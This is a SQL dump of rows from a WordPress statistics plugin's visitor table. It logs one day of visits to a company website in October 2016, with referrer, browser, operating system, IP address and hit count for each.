INSERT INTO `wp_statistics_visitor` VALUES (6903, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.210.56.27', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6904, '2016-10-20', 'https://www.google.com.tr/', 'Chrome', 'Windows', '53.0.2785.143', '', '85.96.182.215', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6905, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.43.5.34', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6906, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.197.237.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6907, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.2.216.210', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6908, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.67.23.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6909, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.152.241.187', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6910, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.117.34.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6911, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.198.103.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6912, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '116.33.24.139', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6913, '2016-10-20', 'https://www.google.com.br/', 'Safari', 'iPhone', '10.0', '', '181.124.130.194', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6914, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.176.194.91', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6915, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '130.105.196.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6916, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.185.45.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6917, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.139.151.152', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6918, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.34.105.54', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6919, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.159.131.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6920, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.99.100.121', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6921, '2016-10-20', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '63.159.137.2', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6922, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '113.197.245.156', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6923, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.5.152.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6924, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.2.250.149', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6925, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.21.255.243', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6926, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.60.39.193', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6927, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.120.160.154', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6928, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.74.243.231', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6929, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.93.250.76', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6930, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.170.197.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6931, '2016-10-20', 'https://www.miller-stephenson.com', 'Safari', 'Linux', '538.1', '', '104.155.116.223', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6932, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.97.162.236', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6933, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.3.133.125', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6934, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.108.65.89', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6935, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '107.222.56.52', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6936, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.200.224.31', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6937, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.217.207.178', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6938, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.218.40.37', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6939, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.6.228.164', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6940, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.149.94.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6941, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.144.208.62', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6942, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.30.83.53', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6943, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.240.100.138', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6944, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.50.53.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6945, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.246.42.125', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6946, '2016-10-20', 'https://www.miller-stephenson.com', 'Installatron', 'Unknown', 'Unknown', '', '104.238.94.202', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6947, '2016-10-20', 'https://www.miller-stephenson.com/ms/wp-cron.php?doing_wp_cron=1476963787.1319580078125000000000', 'WordPress', 'Unknown', '4.6.1', '', '104.238.94.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6948, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.160.20.112', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6949, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6950, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.144.37.83', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6951, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.4.180.36', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6952, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.200.32.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6953, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '12.251.123.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6954, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.86.178.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6955, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.145.190.83', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6956, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '195.142.6.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6957, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.59.58.119', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6958, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.109.214.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6959, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.95.21.152', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6960, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.137.199.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6961, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '156.209.46.234', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6962, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '106.51.132.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6963, '2016-10-20', 'https://www.bing.com/', 'Edge', 'Windows', '13.10586', '', '91.208.250.110', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6964, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.213.57.105', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6965, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.155.201.44', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6966, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '171.49.131.246', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6967, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.222.22.8', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6968, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '60.52.7.85', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6969, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.65.96.46', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6970, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.136.181.52', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6971, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '154.126.107.104', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6972, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.31.188.163', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6973, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6974, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6975, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.90.10.96', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6976, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.245.148.57', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6977, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.116.224.45', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6978, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '148.3.13.88', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6979, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.222.128.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6980, '2016-10-20', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiKr7PHqenPAhXRW4YKHYzZAwIYABAF&sig=AOD64_0yT35bOnzHeZMW2vXN0RV89N1xsg&rct=j&q=&ved=0ahUKEwjft63HqenPAhWBWT4KHZYhAqEQ0QwIJQ&adurl=', 'MSIE', 'Windows', '11.0', '', '72.92.214.209', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6981, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.187.19.135', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6982, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '68.104.243.39', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6983, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.129.210.174', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6984, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.1.111.221', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6985, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.153.161.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6986, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.53.2.12', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6987, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '123.231.126.203', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6988, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '179.179.110.167', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6989, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '116.39.17.211', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6990, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.54.58.242', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6991, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.112.78.135', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6992, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.45.84.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6993, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.139.185.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6994, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.65.229.228', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6995, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.128.206.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6996, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.140.187.76', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6997, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '220.120.14.165', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6998, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '218.148.70.136', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6999, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.75.22.61', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7000, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.17.248.165', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7001, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.37.201.72', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7002, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '156.194.194.75', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7003, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7004, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7005, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.206.176.116', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7006, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.9.190.167', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7007, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.127.148.44', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7008, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '154.118.43.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7009, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.18.4.107', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7010, '2016-10-20', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.127.129', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7011, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '173.199.65.47', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7012, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.46.255.129', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7013, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.58.52.12', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7014, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.165.65.66', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7015, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.90.248.244', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7016, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.168.110.84', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7017, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '222.175.103.46', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7018, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '204.9.211.253', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7019, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.108.56.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7020, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.122.57.0', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7021, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '199.212.68.253', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7022, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.29.175.136', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7023, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '207.110.48.140', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7024, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.171.103.214', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7025, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '171.61.110.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7026, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '143.176.238.61', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7027, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.142.184.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7028, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.91.126', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7029, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '61.82.40.19', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7030, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '104.200.154.76', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7031, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '130.105.192.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7032, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.221.253.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7033, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.165.210.112', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7034, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.11.174.73', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7035, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.17.66.127', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7036, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '118.208.218.169', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7037, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.101.101.139', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7038, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '43.249.226.198', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7039, '2016-10-20', 'https://www.google.com.tr/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.77.48.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7040, '2016-10-20', 'https://www.google.com.tr/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.77.48.101', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7041, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.52.179.23', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7042, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.99.10.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7043, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.225.219.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7044, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '91.121.77.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7045, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.106.132.19', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7046, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.84.74.234', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7047, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.160.184.67', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7048, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.133.236.196', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7049, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7050, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '67.215.23.141', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7051, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.219.14.77', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7052, '2016-10-20', 'https://www.google.com.tr/', 'Firefox', 'Windows', '48.0', '', '212.175.18.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7053, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.52.176.24', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7054, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.48.198.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7055, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.207.9.125', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7056, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.63.9.197', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7057, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '192.168.1.47', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7058, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.36.130.180', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7059, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.36.194.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7060, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '61.10.167.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7061, '2016-10-20', 'https://www.google.com.tr/', 'Chrome', 'Windows', '54.0.2840.59', '', '78.188.73.19', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7062, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.187.51.131', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7063, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '81.167.162.51', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7064, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.161.162.182', '000', 3, 0); 
